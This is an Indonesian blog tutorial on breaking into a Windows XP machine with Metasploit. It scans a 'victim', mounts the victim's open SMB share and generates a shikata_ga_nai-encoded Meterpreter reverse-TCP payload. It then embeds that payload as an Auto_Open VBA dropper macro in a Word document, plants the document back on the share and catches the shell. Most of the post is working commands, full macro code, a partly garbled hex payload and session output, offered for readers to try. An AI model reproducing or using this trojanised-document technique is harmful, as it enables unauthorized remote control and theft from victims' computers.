Jumat, 28 Oktober 2011

Metasploit X MS.Office Word 2007 : Metasploit

Ngga bosen-bosennya sharing, semoga sharing saya kali ini ada yang mau mempraktekan.Kali ini saya akan berbagi, bagaimana mengeksploit Windows XP SP 2 dengan melawan Microsoft Office 2007.
Kedengatannya aneh, tapi ini berhasil lho.

Langsung aja ya?

Preparation:
1. nmap ---> scanning port
2. msfcli ---> eksekusi exploit
3. msfencoder ---> compile shell code buffer overflow


Pertama kita cek dulu ya metasploitnya. Masukan perintah:

msf > show encoders




Output:
 
Encoders
========

   Name                    Disclosure Date  Rank       Description
   ----                    ---------------  ----       -----------
   cmd/generic_sh                           good       Generic Shell Variable Substitution Command Encoder
   cmd/ifs                                  low        Generic ${IFS} Substitution Command Encoder
   cmd/printf_php_mq                        manual     printf(1) via PHP magic_quotes Utility Command Encoder
   generic/none                             normal     The "none" Encoder
   mipsbe/longxor                           normal     XOR Encoder
   mipsle/longxor                           normal     XOR Encoder
   php/base64                               great      PHP Base64 encoder
   ppc/longxor                              normal     PPC LongXOR Encoder
   ppc/longxor_tag                          normal     PPC LongXOR Encoder
   sparc/longxor_tag                        normal     SPARC DWORD XOR Encoder
   x64/xor                                  normal     XOR Encoder
   x86/alpha_mixed                          low        Alpha2 Alphanumeric Mixedcase Encoder
   x86/alpha_upper                          low        Alpha2 Alphanumeric Uppercase Encoder
   x86/avoid_utf8_tolower                   manual     Avoid UTF8/tolower
   x86/call4_dword_xor                      normal     Call+4 Dword XOR Encoder
   x86/context_cpuid                        manual     CPUID-based Context Keyed Payload Encoder
   x86/context_stat                         manual     stat(2)-based Context Keyed Payload Encoder
   x86/context_time                         manual     time(2)-based Context Keyed Payload Encoder
   x86/countdown                            normal     Single-byte XOR Countdown Encoder
   x86/fnstenv_mov                          normal     Variable-length Fnstenv/mov Dword XOR Encoder
   x86/jmp_call_additive                    normal     Jump/Call XOR Additive Feedback Encoder
   x86/nonalpha                             low        Non-Alpha Encoder
   x86/nonupper                             low        Non-Upper Encoder
   x86/shikata_ga_nai                       excellent  Polymorphic XOR Additive Feedback Encoder
   x86/single_static_bit                    manual     Single Static Bit
   x86/unicode_mixed                        manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
   x86/unicode_upper                        manual     Alpha2 Alphanumeric Unicode Uppercase Encoder
Pada tutorial kali ini, kita akan menggunakan encoder x86/shikata_ga_nai. Dalam bahasa jepang, shikata_ga_nai berarti "tidak dapat tertolong" atau "sudah tidak ada harapan".

Keadaan:
1. IP address saya 192.168.56.101
2. IP address korban 192.168.56.50

Briefing:
1. Ketahuilah bahwa korban membuka port 445 untuk melakukan file sharing.
2. Buat shell code dengan msfvenom, lalu kompile dengan encoder x86/shikata_ga_nai
3. Copy exploit dan payload ke dalam data berekstensi .doc atau .docx
3. Tunggu sampai korban mengakses data tersebut
4. Game over

Tutorial:
1. Pertama, scann port dengan bantuan nmap
root@red-dragon:~# nmap 192.168.56.50 -Pn -O -A
Output:
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-10-22 15:04 WIT
Nmap scan report 192.168.56.50
Host is up (0.0000070s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE
80/tcp   open  http
445/tcp open  microsoft-ds

Terlihat bahwa korban membuka port 445 nya.

2. Selanjutnya, kita akan mengakses shared documents korban.
root@red-dragon:~#smbclient -L \\192.168.56.50 -N

Output:
Domain =[VM-XP-SP2] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]

    Sharename    Type        Comment
    ---------    ----        -------

    IPC$        IPC        Remote IPC
    Documents    Disk      
    ADMIN$        Disk        Remote Admin
    C$        Disk        Default Share
Session request to 192.168.56.50 failed (Called name not present)
Session request to 192 failed (Called name not present)
Domain =[VM-XP-SP2] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]

    Server        Comment
    ------        -------

    Workgroup    Master
    ---------    ------

3. Buat direktori di folder shared, kemudian mount folder tersebut.

root@red-dragon:~#mkdir /mnt/shared
root@red-dragon:~#smbmount \\192.168.56.50 /mnt/shared -o rw
password: [kosong] [tekan enter]
root@red-dragon:~#cd /mnt/shared && ls -l
Output:
total 21
-rwxr-xr-x 0  root root     62    2011-08-19    01:12    desktop.ini
-rwxr-xr-x 0  root root     666    2011-08-19    01:30    Laporan.doc

4. Buat direktori vnc, kemudian mount direktori tersebut, dan kopi Laporan.doc ke dalam direktori tersebut.

root@red-dragon:/mnt/shared# mkdir ../vnc
root@red-dragon:/mnt/shared# smbmount \\192.168.56.101/write /mnt/vnc -o rw
password: [kosong] [tekan enter]
root@red-dragon:/mnt/shared# cp Laporan.doc ../vnc/
5. Tahap berikutnya adalah menciptakan exploit dan payload sendiri, yang kemudian di compile dengan encoder x86/shikata_ga_nai

root@red-dragon:/mnt/shared# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=445 -e shikata_ga_nai -i 3 -f vba > ../vnc/vba.txt

6. Ini adalah tahap terpenting, dimana kita akan memasukan exploit dan payload kedalam document, kemudian memberinya kembali pada korban.
    a. Buka file Laporan.doc dengan microsoft word, kemudian pilih tools -> macro -> visual basic editor.
    b. Pilih insert -> module
    c. Buka file vba.txt kemudian copy macro mode ke dalam visual basic auditor.

Penjelasan. Bukalah file vba.txt, maka anda akan menemukan code seperti ini:

'**************************************************************
'*
'* This code is now split into two pieces:
'*  1. The Macro. This must be copied into the Office document
'*     macro editor. This macro will run on startup.
'*
'*  2. The Data. The hex dump at the end of this output must be
'*     appended to the end of the document contents.
'*
'**************************************************************
'*
'* MACRO CODE
'*
'**************************************************************
Sub Auto_Open()
Bla-Bla-Bla
'**************************************************************
'*
'* PAYLOAD DATA
'*
'**************************************************************

Ynmwjwddea
Bla-Bla-Bla
Kemudian copy bagian:

Sub Auto_Open()
    Xptzg12
End Sub
Sub Xptzg12()
    Dim Xptzg7 As Integer
    Dim Xptzg1 As String
    Dim Xptzg2 As String
    Dim Xptzg3 As Integer
    Dim Xptzg4 As Paragraph
    Dim Xptzg8 As Integer
    Dim Xptzg9 As Boolean
    Dim Xptzg5 As Integer
    Dim Xptzg11 As String
    Dim Xptzg6 As Byte
    Dim Ynmwjwddea as String
    Ynmwjwddea = "Ynmwjwddea"
    Xptzg1 = "bNzLqgWr.exe"
    Xptzg2 = Environ("USERPROFILE")
    ChDrive (Xptzg2)
    ChDir (Xptzg2)
    Xptzg3 = FreeFile()
    Open Xptzg1 For Binary As Xptzg3
    For Each Xptzg4 in ActiveDocument.Paragraphs
        DoEvents
            Xptzg11 = Xptzg4.Range.Text
        If (Xptzg9 = True) Then
            Xptzg8 = 1
            While (Xptzg8 < Len(Xptzg11))
                Xptzg6 = Mid(Xptzg11,Xptzg8,4)
                Put #Xptzg3, , Xptzg6
                Xptzg8 = Xptzg8 + 4
            Wend
        ElseIf (InStr(1,Xptzg11,Ynmwjwddea) > 0 And Len(Xptzg11) > 0) Then
            Xptzg9 = True
        End If
    Next
    Close #Xptzg3
    Xptzg13(Xptzg1)
End Sub
Sub Xptzg13(Xptzg10 As String)
    Dim Xptzg7 As Integer
    Dim Xptzg2 As String
    Xptzg2 = Environ("USERPROFILE")
    ChDrive (Xptzg2)
    ChDir (Xptzg2)
    Xptzg7 = Shell(Xptzg10, vbHide)
End Sub
Sub AutoOpen()
    Auto_Open
End Sub
Sub Workbook_Open()
    Auto_Open
End Sub
Save, kemudian copy payload ke lembar kerja:

Ynmwjwddea
&H4D&H5A&H90&H00&H03&H00&H00&H00&H04&H00&H00&H00&HFF&HFF&H00&H00&HB8&H00&H00&H00&H00&H00&H00&H00&H40&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&HE8&H00&H00&H00&H0E&H1F&HBA&H0E&H00&HB4&H09&HCD&H21&HB8&H01&H4C&HCD&H21&H54&H68&H69&H73&H20&H70&H72&H6F&H67&H72&H61&H6D&H20&H63&H61&H6E&H6E&H6F&H74&H20&H62&H65&H20&H72&H75&H6E&H20&H69&H6E&H20&H44&H4F&H53&H20&H6D&H6F&H64&H02&HHF6&H75&H0E&H6A&H3A&HA4&HFF&HD3&H8B&HF0&H83&HC4&HD3&H85&HE0&H74&H0A&H8D&H 0&H00&H00&H00&H83&H7D&H3D&H00&H00&H00&H00&H00&H30&H00&H00&HDB&H00&H91&H00&H00&HB3&H00&H00&H00&H00&HA6&H00&H00&H00&H00&H00&H00&H00&H00&H00&H1C&H00&H00&H00&H00&H8E&H00&HD8&H65&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H18&H000&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H4E&H42&H31&H30&H00&H00&H00&H00&H36&H80&HC1&H4A&H01&H00&H00&H00&H43&H3A&H5C&H6C&H6F&H63&H61&H6C&H30&H5C&H61&H73&H66&H5C&H72&H65&H6C&H65&H61&H73&H65&H5C&H62&H75&H69&H6C&H64&H2D&H32&H2E&H32&H2E&H31&H34&H5C&H73&H75&H70&H70&H6F&H72&H74&H5C&H52&H65&H6C&H65&H61&H73&H65&H5C&H61&H62&H2E&H70&H64&H62&H00
Save document tersebut. Kemudian copy ke direktori shared milik korban.

root@red-dragon:~#cp  ../vnc/Laporan.doc ./
7. Eksekusi exploit dan payload dengan msfcli.

root@red-dragon:~# msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=445 E

Output:
[*] Please wait while we load the module tree...

                 _---------.
             .' #######   ;."
  .---,.    ;@             @@`;   .---,..
." @@@@@'.,'@@            @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@          @@@@@@@@@@@@@ @;
   `.@@@@@@@@@@@@        @@@@@@@@@@@@@@ .'
     "--'.@@@  -.@        @ ,'-   .'--"
          ".@' ; @       @ `.  ;'
            |@@@@ @@@     @    .
             ' @@@ @@   @@    ,
              `.@@@@    @@   .
                ',@@     @   ;           _____________
                 (   3 C    )     /|___ / Metasploit! \
                 ;@'. __*__,."    \|--- \_____________/
                  '(.,...."/


       =[ metasploit v4.1.0-release [core:4.1 api:1.0]
+ -- --=[ 749 exploits - 384 auxiliary - 98 post
+ -- --=[ 228 payloads - 27 encoders - 8 nops
       =[ svn r14024 updated today (2011.10.22)

PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.56.101
LPORT => 445
[*] Started reverse handler on 192.168.56.101:445
[*] Starting the payload handler...

8. Ketika korban mengakses file tersebut, maka ini yang akan terjadi:

[*] Please wait while we load the module tree...

                 _---------.
             .' #######   ;."
  .---,.    ;@             @@`;   .---,..
." @@@@@'.,'@@            @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@          @@@@@@@@@@@@@ @;
   `.@@@@@@@@@@@@        @@@@@@@@@@@@@@ .'
     "--'.@@@  -.@        @ ,'-   .'--"
          ".@' ; @       @ `.  ;'
            |@@@@ @@@     @    .
             ' @@@ @@   @@    ,
              `.@@@@    @@   .
                ',@@     @   ;           _____________
                 (   3 C    )     /|___ / Metasploit! \
                 ;@'. __*__,."    \|--- \_____________/
                  '(.,...."/


       =[ metasploit v4.1.0-release [core:4.1 api:1.0]
+ -- --=[ 749 exploits - 384 auxiliary - 98 post
+ -- --=[ 228 payloads - 27 encoders - 8 nops
       =[ svn r14024 updated today (2011.10.22)

PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.56.101
LPORT => 445
[*] Started reverse handler on 192.168.56.101:445
[*] Starting the payload handler...
[*] Sending stage (749056 bytes) to 1921.68.56.50
[*] Meterpreter session 1 opened (192.168.56.101:445 -> 192.168.56.50:1809) at 2011-10-22 16:25:30 +007
Selamat mencoba . . :D



Sumber : In Here

Diposting oleh Tempat Share tentang IT di 22.38
Label:

0 komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)